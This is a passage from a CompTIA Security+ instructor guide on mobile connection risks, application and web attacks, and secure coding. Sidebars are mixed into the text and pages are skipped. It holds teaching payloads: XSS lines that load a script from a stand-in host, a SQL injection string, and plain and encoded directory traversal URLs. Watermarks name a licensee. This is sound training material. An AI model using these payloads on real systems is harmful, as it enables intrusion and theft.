other types of connections (pairing Bluetooth devices for instance) and for exchanging com/SophosSecurity/
information, such as contact cards. An NFC transaction is sometimes known as a bump, videos/
named after an early mobile sharing app, later redeveloped as Android Beam, to use 10155345347100017).
They also evaluate
NFC. The typical use case is in "smart" posters, where the user can tap the tag in the card and wallet
poster to open a linked web page via the information coded in the tag. Attacks could protectors designed
be developed using vulnerabilities in handling the tag (securityboulevard.com/2019/10/ to block NFC
nfc-false-tag-vulnerability-cve-2019-9295). It is also possible that there may be some transmissions.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
360 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
way to exploit NFC by crafting tags to direct the device browser to a malicious web
page where the attacker could try to exploit any vulnerabilities in the browser.
NFC does not provide encryption, so eavesdropping and man-in-the-middle attacks are
possible if the attacker can find some way of intercepting the communication and the
software services are not encrypting the data.
The widest application of NFC is to make payments via contactless point-of-sale (PoS)
machines. To configure a payment service, the user enters their credit card information
into a mobile wallet app on the device. The wallet app does not transmit the original
credit card information, but a one-time token that is interpreted by the card merchant
and linked backed to the relevant customer account. There are three major mobile
wallet apps: Apple Pay, Google Pay (formerly Android Pay), and Samsung Pay.
Despite having a close physical proximity requirement, NFC is vulnerable to several
types of attacks. Certain antenna configurations may be able to pick up the RF signals
emitted by NFC from several feet away, giving an attacker the ability to eavesdrop
from a more comfortable distance. An attacker with a reader may also be able to skim
information from an NFC device in a crowded area, such as a busy train. An attacker
may also be able to corrupt data as it is being transferred through a method similar
to a DoS attack—by flooding the area with an excess of RF signals to interrupt the
transfer.
Skimming a credit or bank card will give the attacker the long card number and expiry date.
Completing fraudulent transactions directly via NFC is much more difficult as the attacker
would have to use a valid merchant account and fraudulent transactions related to that
account would be detected very quickly.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 361
group messaging/calling, and read receipts. RCS is supported by carriers via Universal
Profile for Advanced Messaging (gsma.com/futurenetworks/digest/universal-profile-
version-2-0-advanced-rcs-messaging). The main drawbacks of RCS are that carrier
support is patchy (messages fallback to SMS if RCS is not supported) and there is no
end-to-end encryption, at the time of writing (theverge.com/2020/5/27/21271186/
google-rcs-t-mobile-encryption-ccmi-universal-profile).
Vulnerabilities in processing attachments and rich formatting have resulted in DoS
attacks against certain handsets in the past, so it is important to keep devices patched
against known threats.
Push notifications are store services (such as Apple Push Notification Service and
Google Cloud to Device Messaging) that an app or website can use to display an alert
on a mobile device. Users can choose to disable notifications for an app, but otherwise
the app developer can target notifications to some or all users with that app installed.
Developers need to take care to properly secure the account and services used to
send push notifications. There have been examples in the past of these accounts being
hacked and used to send fake communications.
A baseband update modifies the firmware of the radio modem used for cellular, Wi-Fi, Firmware Over-the-Air
Bluetooth, NFC, and GPS connectivity. The radio firmware in a mobile device contains Updates
an operating system that is separate from the end-user operating system (for example,
Android or iOS). The modem uses its own baseband processor and memory, which
boots a real-time operating system (RTOS). An RTOS is often used for time-sensitive
embedded controllers, of the sort required for the modulation and frequency shifts
that underpin radio-based connectivity.
The procedures for establishing radio connections are complex and require strict
compliance with regulatory certification schemes, so incorporating these functions in
the main OS would make it far harder to bring OS updates to market. Unfortunately,
baseband operating systems have been associated with several vulnerabilities over the
years, so it is imperative to ensure that updates are applied promptly. These updates
are usually pushed to the handset by the device vendor, often as part of OS upgrades.
The updates can be delivered wirelessly, either through a Wi-Fi network or the data
connection, referred to as over-the-air (OTA). A handset that has been jailbroken
or rooted might be able to be configured to prevent baseband updates or apply a
particular version manually, but in the general course of things, there is little reason to
do so.
There are various ways of exploiting vulnerabilities in the way these updates work. A
well-resourced attacker can create an "evil base station" using a Stingray/International
Mobile Subscriber Identity (IMSI) catcher. This will allow the attacker to identify the
location of cell devices operating in the area. In some circumstances it might be
possible to launch a man-in-the-middle attack and abuse the firmware update process
to compromise the phone.
Cellular networks are microwave radio networks provisioned for multiple subscribers. Microwave Radio
Microwave radio is also used as a backhaul link from a cell tower to the service Connection Methods
provider's network. These links are important to 5G, where many relays are required
and provisioning fiber optic cabled backhaul can be difficult. Private microwave links
are also used between sites. A microwave link can be provisioned in two modes:
• Point-to-point (P2P) microwave uses high gain antennas to link two sites. High
gain means that the antenna is highly directional. Each antenna is pointed directly
at the other. In terms of security, this makes it difficult to eavesdrop on the signal,
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
362 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
as an intercepting antenna would have to be positioned within the direct path. The
satellite modems or routers are also normally paired to one another and can use
over-the-air encryption to further mitigate against snooping attacks.
Multipoint can be used in other contexts. For example, Bluetooth supports a multipoint
mode. This can be used to connect a headset to multiple sources (a PC and a
smartphone, for instance) simultaneously.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 363
Review Activity:
Secure Mobile Device Connections
Answer the following questions:
An attacker might set up some sort of rogue access point (Wi-Fi) or cell tower (cellular)
to perform eavesdropping or man-in-the-middle attacks. For Personal Area Network
(PAN) range communications, there might be an opportunity for an attacker to run
exploit code over the channel.
This would allow a PC or laptop to connect to the Internet via the smartphone's cellular
data connection. This could be used to evade network security mechanisms, such as
data loss prevention or content filtering.
True (in theory)—though the vector is known to the mobile OS and handset vendors so
the exploit is unlikely to be able to run without user authorization.
Bluesnarfing.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
364 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 13
Summary
Teaching You should be able to use endpoint management solutions to apply device and
Tip application enforcement and monitoring and understand risks from mobile connection
Check that students methods and other technologies.
are confident about
the content that has
been covered. If there Guidelines for Implementing Secure Mobile Solutions
is time, re-visit any
content examples that Follow these guidelines when you deploy or reassess mobile device and application
they have questions management:
about. If you have
used all the available
• Select a mobile deployment model that best fits organization security requirements
time for this lesson and employee/business needs (BYOD, COBO, COPE, CYOD).
block, note the issues,
and schedule time for • Deploy a mobile/universal endpoint management platform to set device and
a review later in the application policies:
course.
• Allowed connection methods (cellular, Wi-Fi, tethering, and Bluetooth).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 14
Summarizing Secure
Application Concepts
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
366 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 14A
Analyze Indicators
of Application Attacks
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 367
Error Handling
An application attack may cause an error message. In Windows, this may be of the
following types: "Instruction could not be read or written," "Undefined exception,"
or "Process has encountered a problem." One issue for error handling is that the
application should not reveal configuration or platform details that could help an
attacker. For example, an unhandled exception on a web application might show an
error page that reveals the type and configuration of a database server.
In an overflow attack, the threat actor submits input that is too large to be stored in
Overflow
a variable assigned by the application. Some of the general overflow vulnerabilities
Vulnerabilities
are discussed here. To keep up to date with specific attack methods and new types of
attack, monitor a site such as OWASP (owasp.org/www-community/attacks). Ideally, the Teaching
code used to attempt these attacks will be identified by network IDS or by an endpoint Tip
protection agent. Unsuccessful attempts may be revealed through unexplained crashes To protect against
or error messages following a file download, execution of a new app or a script, or software exploitation,
connection of new hardware. apply security
patches (for third-
Buffer Overflow party applications) or
secure programming
A buffer is an area of memory that the application reserves to store expected data. To practice (for your own
exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills applications).
the buffer. One of the most common vulnerabilities is a stack overflow. The stack is an OWASP is a great
area of memory used by a program subroutine. It includes a return address, which is the resource for more
location of the program that called the subroutine. An attacker could use a buffer overflow detailed information.
to change the return address, allowing the attacker to run arbitrary code on the system. As EternalBlue
shows, an exploit
might use several
attack techniques
to compromise
vulnerable code.
When executed normally, a function will return control to the calling function. If the code
is vulnerable, an attacker can pass malicious data to the function, overflow the stack,
and run arbitrary code to gain a shell on the target system.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
368 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Integer Overflow
An integer is a positive or negative number with no fractional component (a whole
number). Integers are widely used as a data type, where they are commonly defined
with fixed lower and upper bounds. An integer overflow attack causes the target
software to calculate a value that exceeds these bounds. This may cause a positive
number to become negative (changing a bank debit to a credit, for instance). It could
also be used where the software is calculating a buffer size; if the attacker is able to
make the buffer smaller than it should be, he or she may then be able to launch a
buffer overflow attack.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 369
malicious process could spawn multiple looping threads to use up CPU time, or write
thousands of files to disk. Distributed attacks against network applications perform a
type of resource exhaustion attack by starting but not completing sessions, causing
the application to fill up its state table, leaving no opportunities for genuine clients
to connect.
A dynamic link library (DLL) is a binary package that implements some sort of standard DLL Injection and
functionality, such as establishing a network connection or performing cryptography. Driver Manipulation
The main process of a software application is likely to load several DLLs during the
normal course of operations. Teaching
Tip
DLL injection is a vulnerability in the way the operating system allows one process to
attach to another. This functionality can be abused by malware to force a legitimate Stress to students
that like any EXE file,
process to load a malicious link library. The link library will contain whatever functions DLLs and drivers
the malware author wants to be able to run. Malware uses this technique to move from should only be run or
one host process to another to avoid detection. A process that has been compromised installed if they are
by DLL injection might open unexpected network connections, or interact with files and signed with a valid
the registry suspiciously. certificate from a
reputable vendor.
To perform DLL injection the malware must already be operating with sufficient
privileges, typically local administrator or system privileges. It must also evade
detection by antivirus software. One means of doing this is code refactoring.
Refactoring means that the code performs the same function by using different
methods (control blocks, variable types, and so on). Refactoring means that the A-V
software may no longer identify the malware by its signature.
OS function calls to allow DLL injection are legitimately used for operations such
as debugging and monitoring. Another opportunity for malware authors to exploit
these calls is the Windows Application Compatibility framework. This allows legacy
applications written for an OS, such as Windows XP, to run on later versions. The code
library that intercepts and redirects calls to enable legacy mode functionality is called a
shim. The shim must be added to the registry and its files (packed in a shim database/
.SDB file) added to the system folder. The shim database represents a way that
malware with local administrator privileges can run on reboot (persistence). Show Slide(s)
A threat actor has to be either relatively lucky to find an unpatched vulnerability, or Teaching
well-resourced enough to develop a zero-day exploit. Once an initial foothold has been Tip
gained, the threat actor may try to find simpler ways to move around the network. You might also want to
mention golden ticket
Attackers can extend their lateral movement by a great deal if they are able to attacks (youtube.com/
compromise host credentials. One common credential exploit technique for lateral watch?v=
movement is called pass the hash (PtH). This is the process of harvesting an account's lJQn06QLwEw).
cached credentials when the user is logged into a single sign-on (SSO) system so the If students are
attacker can use the credentials on other systems. If the threat actor can obtain the interested in learning
hash of a user password, it is possible to present the hash (without cracking it) to more about Pass
the Hash and ticket
authenticate to network protocols such as the Windows File Sharing protocol Server
forging, refer them
Message Block (SMB), and other protocols that accept NTLM hashes as authentication to the briefing here:
credentials. For example, most Windows domain networks are configured to allow media.blackhat.com/
NTLM as a legacy authentication method for services. The attacker's access isn't just bh-us-12/Briefings/
limited to a single host, as they can pass the hash onto any computer in the network Duckwall/BH_US_12_
that is tied to the domain. This drastically cuts down on the effort the threat actor must Duckwall_Campbell_
Still_Passing_WP.pdf
spend in moving from host to host.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
370 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Pass the hash is relatively difficult to detect, as it exploits legitimate network behavior.
A detection system can be configured to correlate a sequence of security log events
using NTLM-type authentication, but this method can be prone to false positives
(blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 371
Review Activity:
Indicators of Application Attacks
Answer the following questions:
The Notepad process has been compromised, possibly using buffer overflow or a DLL/
process injection attack. The threat actor has then performed lateral movement and
privilege escalation, gaining higher privileges through remote code execution on the
application server.
The integer value could be used to allocate less memory than a process expects,
making a buffer overflow easier to achieve.
A process claims memory locations but never releases them, reducing the amount of
memory available to other processes. This will damage performance, could prevent
other processes from starting, and if left unchecked could crash the OS.
Various OS system functions allow one process to manipulate another and force it to
load a dynamic link library (DLL). This means that the malware code can be migrated
from one process to another, evading detection.
These attacks are revealed by use of certain modes of NTLM authentication within the
security (audit) log of the source and target hosts. These indicators can be prone to
false positives, however, as many services use NTLM authentication legitimately.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
372 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 14B
Analyze Indicators of Web
Application Attacks
HTTP Methods
As part of URL analysis, it is important to understand how HTTP operates. An HTTP
session starts with a client (a user-agent, such as a web browser) making a request to
an HTTP server. The connection establishes a TCP connection. This TCP connection can
be used for multiple requests, or a client can start new TCP connections for different
requests. A request typically comprises a method, a resource (such as a URL path),
version number, headers, and body. The principal method is GET, used to retrieve a
resource. Other methods include:
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 373
Percent Encoding
A URL can contain only unreserved and reserved characters from the ASCII set.
Reserved ASCII characters are used as delimiters within the URL syntax and should only
be used unencoded for those purposes. The reserved characters are:
: / ? # [ ] @ ! $ & ' ( ) * + , ; =
There are also unsafe characters, which cannot be used in a URL. Control characters,
such as null string termination, carriage return, line feed, end of file, and tab, are
unsafe. Percent encoding allows a user-agent to submit any safe or unsafe character
(or binary data) to the server within the URL. Its legitimate uses are to encode reserved
characters within the URL when they are not part of the URL syntax and to submit
Unicode characters. Percent encoding can be misused to obfuscate the nature of a URL
(encoding unreserved characters) and submit malicious input. Percent encoding can
exploit weaknesses in the way the server application performs decoding. Consequently,
URLs that make unexpected or extensive use of percent encoding should be treated
carefully. You can use a resource such as W3 Schools (w3schools.com/tags/ref_
urlencode.asp) for a complete list of character codes, but it is helpful to know some of
the characters most widely used in exploits.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
374 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching https://webapp.foo/?
Tip Action=RunInstance&Id=123&Count=1&Instance
Make sure students
AccessKey=MyInstanceAccessKey&Placement=us-
can identify the east&MyAuthorizationToken
general format of an
API call. If the API isn't secure, threat actors can easily take advantage of it to compromise the
services and data stored on the web application. An API must only be used over an
encrypted channel (HTTPS). API calls over plain HTTP are not secure and could easily be
impersonated or modified by a third party. Some other common attacks against APIs
target the following weaknesses and vulnerabilities:
• Ineffective secrets management, allowing threat actors to discover an API key and
perform any action authorized to that key.
• Lack of input validation, allowing the threat actor to insert arbitrary parameters into
API methods and queries. This is often referred to as allowing unsanitized input.
• Denial of service (DoS) by bombarding the API with spurious calls. Protection against
this attack can be provided through throttling/rate-limiting mechanisms.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 375
Viewing cookies set by Google's home page using the Firefox browser's Inspector tools. These cookies
are not used for authentication, but they do track whether the user has visited the site before. The
CONSENT cookie tracks whether the user has agreed to the terms and conditions of use.
In the context of a web application, session hijacking most often means replaying a Session Hijacking and
cookie in some way. Attackers can sniff network traffic to obtain session cookies sent Cross-Site Request
over an unsecured network, like a public Wi-Fi hotspot. To counter cookie hijacking, Forgery (2)
you can encrypt cookies during transmission, delete cookies from the client's browser
cache when the client terminates the session, and design your web app to deliver a Teaching
new cookie with each new session between the app and the client's browser. Tip
Session prediction attacks focus on identifying possible weaknesses in the generation Note that a client-
side attack is where
of session tokens that will enable an attacker to predict future valid session values. If the browser runs the
an attacker can predict the session token, then the attacker can take over a session malicious code. This
that has yet to be established. A session token must be generated using a non- might trigger some
predictable algorithm, and it must not reveal any information about the session client. action on the server,
In addition, proper session management dictates that apps limit the lifespan of a but it is client-side
because the browser
session and require reauthentication after a certain period.
is coding the request.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
376 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Clickjacking
Clickjacking is an attack where what the user sees and trusts as a web application
with some sort of login page or form contains a malicious layer or invisible iFrame
that allows an attacker to intercept or redirect user input. Clickjacking can be launched
using any type of compromise that allows the adversary to run arbitrary code as a
script. Clickjacking can be mitigated by using HTTP response headers that instruct the
browser not to open frames from different origins (domains) and by ensuring that any
buttons or input boxes on a page are positioned on the top-most layer.
SSL Strip
Show Slide(s)
A Secure Sockets Layer (SSL) strip attack is launched against clients on a local network
as they try to make connections to websites. The threat actor must first perform a
Cross-Site Scripting Man-in-the-Middle attack via ARP poisoning to masquerade as the default gateway.
When a client requests an HTTP site that redirects to an HTTPS site in an unsafe way,
Teaching
the sslstrip utility (tools.kali.org/information-gathering/sslstrip) proxies the request and
Tip
response, serving the client the HTTP site, hopefully with an unencrypted login form. If
Make sure students
the user enters credentials, they will be captured by the threat actor. Sites can use the
can identify code that
performs XSS. HTTP Strict Transport Security (HSTS) lists maintained by browsers to prevent clients
Also check that
requesting HTTP in the first place.
students understand
the difference
between XSRF and
Cross-Site Scripting
XSS. XSRF spoofs
Web applications depend on scripting, and most websites these days are web
a specific request
against the web applications rather than static web pages. If the user attempts to disable scripting,
application; XSS is a very few sites will be left available. A cross-site scripting (XSS) attack exploits the fact
means of running any that the browser is likely to trust scripts that appear to come from a site the user has
arbitrary code. An XSS chosen to visit. XSS inserts a malicious script that appears to be part of the trusted site.
attack could be used A nonpersistent type of XSS attack would proceed as follows:
to perform XSRF, for
instance. 1. The attacker identifies an input validation vulnerability in the trusted site.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 377
2. The attacker crafts a URL to perform a code injection against the trusted site. This
could be coded in a link from the attacker's site to the trusted site or a link in an
email message.
3. When the user clicks the link, the trusted site returns a page containing the
malicious code injected by the attacker. As the browser is likely to be configured
to allow the site to run scripts, the malicious code will execute.
The malicious code could be used to deface the trusted site (by adding any sort of
arbitrary HTML code), steal data from the user's cookies, try to intercept information
entered into a form, perform a request forgery attack, or try to install malware. The
crucial point is that the malicious code runs in the client's browser with the same
permission level as the trusted site.
An attack where the malicious input comes from a crafted link is a reflected or
nonpersistent XSS attack. A stored/persistent XSS attack aims to insert code into a
back-end database or content management system used by the trusted site. For
example, the attacker may submit a post to a bulletin board with a malicious script
embedded in the message. When other users view the message, the malicious script
is executed. For example, with no input sanitization, a threat actor could type the
following into a new post text field:
Check out this amazing <a href="https://trusted.
foo">website</a><script src="https://badsite.foo/
hook.js"></script>.
Users viewing the post will have the malicious script hook.js execute in their browser.
A third type of XSS attack exploits vulnerabilities in client-side scripts. Such scripts often
use the Document Object Model (DOM) to modify the content and layout of a web
page. For example, the "document.write" method enables a page to take some user
input and modify the page accordingly. An exploit against a client-side script could
work as follows:
1. The attacker identifies an input validation vulnerability in the trusted site. For
example, a message board might take the user's name from an input text box
and show it in a header.
https://trusted.foo/messages?user=james
2. The attacker crafts a URL to modify the parameters of a script that the server will
return, such as:
https://trusted.foo/messages#user=James%3Cscript%20
src%3D%22https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fbadsite.foo%2Fhook.
js%22%3E%3C%2Fscript%3E
3. The server returns a page with the legitimate DOM script embedded, but
containing the parameter:
Teaching
Structured Query Language Injection Attacks Tip
Make sure students
Attacks such as session replay, CSRF, and DOM-based XSS are client-side attacks. can identify SQL code
This means that they execute arbitrary code on the browser. A server-side attack and suspicious query
causes the server to do some processing or run a script or query in a way that is not strings.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
378 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
authorized by the application design. Most server-side attacks depend on some kind of
injection attack.
Where an overflow attack works against the way a process performs memory
management, an injection attack exploits some unsecure way in which the application
processes requests and queries. For example, an application might allow a user to view
his or her profile with a database query that should return the single record for that
one user's profile. An application vulnerable to an injection attack might allow a threat
actor to return the records for all users, or to change fields in the record when they are
only supposed to be able to read them.
A web application is likely to use Structured Query Language (SQL) to read and write
information from a database. The main database operations are performed by SQL
statements for selecting data (SELECT), inserting data (INSERT), deleting data (DELETE),
and updating data (UPDATE). In a SQL injection attack, the threat actor modifies
one or more of these four basic functions by adding code to some input accepted by
the app, causing it to execute the attacker's own set of SQL queries or parameters.
If successful, this could allow the attacker to extract or insert information into the
database or execute arbitrary code on the remote system using the same privileges as
the database application (owasp.org/www-community/attacks/SQL_Injection).
For example, consider a web form that is supposed to take a name as input. If the user
enters "Bob", the application runs the following query:
SELECT * FROM tbl_user WHERE username = 'Bob'
If a threat actor enters the string ' or 1=1-- and this input is not sanitized, the following
malicious query will be executed:
SELECT * FROM tbl_user WHERE username = '' or 1=1--#
The logical statement 1=1 is always true, and the --# string turns the rest of the
statement into a comment, making it more likely that the web application will parse
this modified version and dump a list of all users.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 379
Directory traversal is another type of injection attack performed against a web server. Directory Traversal
The threat actor submits a request for a file outside the web server's root directory by and Command
submitting a path to navigate to the parent directory (../). This attack can succeed if the Injection Attacks
input is not filtered properly and access permissions on the file are the same as those
on the web server directory.
The threat actor might use a canonicalization attack to disguise the nature of the
malicious input. Canonicalization refers to the way the server converts between the
different methods by which a resource (such as a file path or URL) may be represented
and submitted to the simplest (or canonical) method used by the server to process the
input. Examples of encoding schemes include HTML entities and character set percent
encoding (ASCII and Unicode). An attacker might be able to exploit vulnerabilities in
the canonicalization process to perform code injection or facilitate directory traversal.
For example, to perform a directory traversal attack, the attacker might submit a URL
such as:
http://victim.foo/?show=../../../../etc/config
A limited input validation routine would prevent the use of the string ../ and refuse the
request. If the attacker submitted the URL using the encoded version of the characters,
he or she might be able to circumvent the validation routine:
http://victim.foo/?
show=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/config
A command injection attack attempts to cause the server to run OS shell commands
and return the output to the browser. As with directory traversal, the web server
should normally be able to prevent commands from operating outside of the server's
directory root and to prevent commands from running with any other privilege level
than the web "guest" user (who is normally granted only very restricted privileges).
A successful command injection attack would find some way of circumventing this
security (or find a web server that is not properly configured).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
380 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 381
SSRF encompasses a very wide range of potential exploits and targets, some of
which include:
• Reconnaissance—a response may contain metadata describing the type and
configuration of internal servers. SSRF can also be used to port scan within the
internal network.
• Credential stealing—a response may contain an API key that the internal servers use
between themselves.
• Protocol smuggling—despite initially being carried over HTTP, the SSRF might target
an internal SMTP or FTP server. That server may be configured in a "best effort"
way, strip the HTTP header, and do its best to return the response to the SMTP or
FTP request.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
382 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Indicators of Web Application Attacks
Answer the following questions:
1. You are reviewing access logs on a web server and notice repeated requests
for URLs containing the strings %3C and %3E. Is this an event that should be
investigated further, and why?
Those strings represent percent encoding for HTML tag delimiters (< and >). This could
be an XSS attempt to inject a script so should be investigated.
2. You have been asked to monitor baseline API usage so that a rate limiter
value can be set. What is the purpose of this?
A rate limiter will mitigate denial of service (DoS) attacks on the API, where a malicious
entity generates millions of spurious requests to block legitimate ones. You need to
establish a baseline to ensure continued availability for legitimate users by setting the
rate limit at an appropriate level.
The attacker captures some data, such as a cookie, used to log on or start a session
legitimately. The attacker then resends the captured data to re-enable the connection.
The attacker inserts an invisible layer into a trusted web page that can intercept or
redirect input without the user realizing.
Where the attacker inserts malicious code into the back-end database used to serve
content to the trusted site.
The attacker needs to find a vulnerable input method, such as a form control or URL or
script parser, that will allow the execution of OS shell commands.
Server-side request forgery (SSRF) causes a public server to make an arbitrary request
to a back-end server. This is made much harder if the threat actor has to defeat
an authentication or authorization mechanism between the web server and the
database server.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 383
Topic 14C
Summarize Secure Coding Practices
The security considerations for new programming technologies should be well Secure Coding
understood and tested before deployment. One of the challenges of application Techniques
development is that the pressure to release a solution often trumps any requirement
to ensure that the application is secure. A legacy software design process might be Teaching
heavily focused on highly visible elements, such as functionality, performance, and Tip
cost. Modern development practices use a security development life cycle running in Check that students
parallel or integrated with the focus on software functionality and usability. Examples understand the
include Microsoft's SDL (microsoft.com/en-us/securityengineering/sdl) and the OWASP difference between
Software Assurance Maturity Model (owasp.org/www-project-samm) and Security input validation and
output encoding.
Knowledge Framework (owasp.org/www-project-security-knowledge-framework).
Input validation occurs
OWASP also collates descriptions of specific vulnerabilities, exploits, and mitigation
when a script takes
techniques, such as the OWASP Top 10 (owasp.org/www-project-top-ten). data passed to it by
Some of the most important coding practices are input validation, output encoding, some other process.
This could be an API
and error handling. request, user form
data, and so on. Input
Input Validation validation can be
performed by client-
A primary vector for attacking applications is to exploit faulty input validation. Input side code, server-side
could include user data entered into a form or URL passed by another application as code, or both.
a URL or HTTP header. Malicious input could be crafted to perform an overflow attack Output encoding
or some type of script or SQL injection attack. To mitigate this risk, all input methods occurs when a script
should be documented with a view to reducing the potential attack surface exposed by passes data to another
the application. There must be routines to check user input, and anything that does not script. For example,
when a server passes
conform to what is required must be rejected. parameters to a DOM
script running in
Normalization and Output Encoding the browser, output
encoding ensures
Where an application accepts string input, the input should be subjected to it isn't passing any
normalization procedures before being accepted. Normalization means that a string malicious "<script>"
is stripped of illegal characters or substrings and converted to the accepted character contents. Output
set. This ensures that the string is in a format that can be processed correctly by the encoding avoids the
assumption that
input validation routines. input will have been
When user-generated strings are passed through different contexts in a web sanitized already.
application—between HTTP, JavaScript, PHP, and SQL for instance—each with
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
384 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Set the HttpOnly attribute to make the cookie inaccessible to document object
model/client-side scripting.
• Use the SameSite attribute to control from where a cookie may be sent, mitigating
request forgery attacks.
Response Headers
A number of security options can be set in the response header returned by the
server to the client (owasp.org/www-project-secure-headers). While it should seem
like a straightforward case of enabling all these, developers are often constrained by
compatibility and implementation considerations between different client browser
and server software types and versions. Some of the most important security-relevant
header options are:
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 385
• HTTP Strict Transport Security (HSTS)—forces browser to connect using HTTPS only,
mitigating downgrade attacks, such as SSL stripping.
Data exposure is a fault that allows privileged information (such as a token, password, Data Exposure and
or personal data) to be read without being subject to the appropriate access controls. Memory Management
Applications must only transmit such data between authenticated hosts, using
cryptography to protect the session. When incorporating encryption in your code, it's
important to use encryption algorithms and techniques that are known to be strong,
rather than creating your own.
Error Handling
A well-written application must be able to handle errors and exceptions gracefully.
This means that the application performs in a controlled way when something
unpredictable happens. An error or exception could be caused by invalid user input, a
loss of network connectivity, another server or process failing, and so on. Ideally, the
programmer will have written a structured exception handler (SEH) to dictate what
the application should then do. Each procedure can have multiple exception handlers.
Some handlers will deal with anticipated errors and exceptions; there should also be
a catchall handler that will deal with the unexpected. The main goal must be for the
application not to fail in a way that allows the attacker to execute code or perform
some sort of injection attack. One infamous example of a poorly written exception
handler is the Apple GoTo bug (nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-
goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch).
Another issue is that an application's interpreter may default to a standard handler
and display default error messages when something goes wrong. These may reveal
platform information and the inner workings of code to an attacker. It is better for an
application to use custom error handlers so that the developer can choose the amount
of information shown when an error is caused.
Technically, an error is a condition that the process cannot recover from, such as the system
running out of memory. An exception is a type of error that can be handled by a block of
code without the process crashing. Note that exceptions are still described as generating
error codes/messages, however.
Memory Management
Many arbitrary code attacks depend on the target application having faulty memory
management procedures. This allows the attacker to execute his or her own code in
the space marked out by the target application. There are known unsecure practices
for memory management that should be avoided and checks for processing untrusted
input, such as strings, to ensure that it cannot overwrite areas of memory.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
386 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Obfuscation/Camouflage
It is important that code be well-documented, to assist the efforts of multiple
programmers working on the same project. Well-documented code is also easier to
analyze, however, which may assist the development of attacks. Code can be made
difficult to analyze by using an obfuscator, which is software that randomizes the
names of variables, constants, functions, and procedures, removes comments and
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 387
white space, and performs other operations to make the compiled code physically
and mentally difficult to read and follow. This sort of technique might be used to
make reverse engineering an application more difficult and as a way of disguising
malware code.
Development is only one stage in the software life cycle. A new release of an Static Code Analysis
application or automation script should be audited to ensure that it meets the goals of
confidentiality, integrity, and availability critical to any secure computer system.
Static code analysis (or source code analysis) is performed against the application
code before it is packaged as an executable process. The analysis software must
support the programming language used by the source code. The software will scan
the source code for signatures of known issues, such as OWASP Top 10 Most Critical
